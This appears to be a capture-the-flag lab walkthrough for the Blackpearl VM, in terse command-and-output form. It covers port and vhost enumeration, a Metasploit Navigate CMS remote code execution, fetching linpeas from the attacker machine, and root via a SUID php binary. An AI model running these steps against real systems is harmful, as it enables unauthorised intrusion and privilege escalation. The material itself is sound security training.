Linux blackpearl 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64


    nmap -A -T4 -p- 192.168.57.10
        Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-05 14:39 EDT
        Nmap scan report for 192.168.57.10
        Host is up (0.00046s latency).
        Not shown: 65532 closed tcp ports (reset)
        PORT   STATE SERVICE VERSION
        22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
        | ssh-hostkey:
        |   2048 66:38:14:50:ae:7d:ab:39:72:bf:41:9c:39:25:1a:0f (RSA)
        |   256 a6:2e:77:71:c6:49:6f:d5:73:e9:22:7d:8b:1c:a9:c6 (ECDSA)
        |_  256 89:0b:73:c1:53:c8:e1:88:5e:c3:16:de:d1:e5:26:0d (ED25519)
        53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u5 (Debian Linux)
        | dns-nsid:
        |_  bind.version: 9.11.5-P4-5.1+deb10u5-Debian
        80/tcp open  http    nginx 1.14.2
        |_http-title: Welcome to nginx!
        |_http-server-header: nginx/1.14.2
        MAC Address: 08:00:27:39:02:57 (Oracle VirtualBox virtual NIC)
        Device type: general purpose
        Running: Linux 4.X|5.X
        OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
        OS details: Linux 4.15 - 5.6
        Network Distance: 1 hop
        Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.57.10/FUZZ

        ...
        secret                  [Status: 200, Size: 209, Words: 31, Lines: 9, Duration: 4ms]
                        [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 7ms]
        :: Progress: [75848/220560] :: Job [1/1] :: 5289 req/sec :: Duration: [0:00:09] :: Errors: 0 ::fatal error:
        unexpected signal during runtime execution
        [signal SIGSEGV: segmentation violation code=0x80 addr=0x0 pc=0x42596b]

        ...


        https://192.168.57.10/secret
            cat secret.txt
                OMG you got r00t !

                Just kidding... search somewhere else. Directory busting won't give anything.

                <This message is here so that you don't waste more time directory busting this particular website.>

                - Alek 

    dnsrecon -r 127.0.0.0/24 -n 192.168.57.10 -d blah
        [*] Performing Reverse Lookup from 127.0.0.0 to 127.0.0.255
        [+]      PTR blackpearl.tcm 127.0.0.1
        [+] 1 Records Found

     dnsrecon -r 127.0.0.0/24 -n 192.168.57.10
        [*] Performing Reverse Lookup from 127.0.0.0 to 127.0.0.255
        [+]      PTR blackpearl.tcm 127.0.0.1
        [+] 1 Records Found

    nano /etc/hosts/
        192.168.57.5 blackpearl.tcm

    http://blackpearl.tcm/ (firefox)
        PHP Version 7.3.27-1~deb10u1
            System 	Linux blackpearl 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
            Build Date 	Feb 13 2021 16:31:40
            Server API 	FPM/FastCGI
            Virtual Directory Support 	disabled
            Configuration File (php.ini) Path 	/etc/php/7.3/fpm
            Loaded Configuration File 	/etc/php/7.3/fpm/php.ini
            Scan this dir for additional .ini files 	/etc/php/7.3/fpm/conf.d


    ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://blackpearl.tcm/FUZZ
        ...
        navigate                [Status: 301, Size: 185, Words: 6, Lines: 8, Duration: 1ms]
                        [Status: 200, Size: 86804, Words: 4215, Lines: 1040, Duration: 8ms]
        :: Progress: [220560/220560] :: Job [1/1] :: 10914 req/sec :: Duration: [0:00:26] :: Errors: 0 ::


    Google: navigate cms exploit
        https://www.exploit-db.com/exploits/45561
        https://www.rapid7.com/db/modules/exploit/multi/http/navigate_cms_rce/

    msfconsole
        use exploit/multi/http/navigate_cms_rce
            options
                set rhosts 192.168.57.10
                set vhost blackpearl.tcm
                show targets
                run
            meterpreter> shell
            whoami
            www-data

    google: tty shell
        https://sushant747.gitbooks.io/total-oscp-guide/content/spawning_shells.html
            
            python -c 'import pty; pty.spawn("/bin/sh")'

             wget http://192.168.57.5/linpeas.sh linpeas.sh

        (kali)
        #python3 -m http.server 80

              $chmod +x linpeas.sh
              $./linpeas.sh
                  ./linpeas.sh: 465: ./linpeas.sh: peass{VARIABLES}: not found
                                                   ╔═══════════════════╗
                    ═══════════════════════════════╣ Basic information ╠═══════════════════════════════
                                                   ╚═══════════════════╝
                    OS: Linux version 4.19.0-16-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1
                    SMP Debian 4.19.181-1 (2021-03-19)
                    User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
                    Hostname: blackpearl
                    Writable folder: /dev/shm
                    ...
                    (todas as informações relevantes estavam no usuário root)

                $find / -type f -perm -4000 2>/dev/null

                    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
                    /usr/lib/eject/dmcrypt-get-device
                    /usr/lib/openssh/ssh-keysign
                    /usr/bin/umount
                    /usr/bin/newgrp
                    /usr/bin/mount
                    /usr/bin/php7.3
                    /usr/bin/su
                    /usr/bin/chfn
                    /usr/bin/passwd
                    /usr/bin/chsh
                    /usr/bin/gpasswd
                    
        Google: gtfobins
        (https://gtfobins.github.io/gtfobins/php/#suid)

            /usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"
        # whoami
        root
        # cd /root
        # ls
        flag.txt
        # cat flag.txt
        Good job on this one.
        Finding the domain name may have been a little guessy,
        but the goal of this box is mainly to teach about Virtual Host Routing which is used in a lot of CTF.


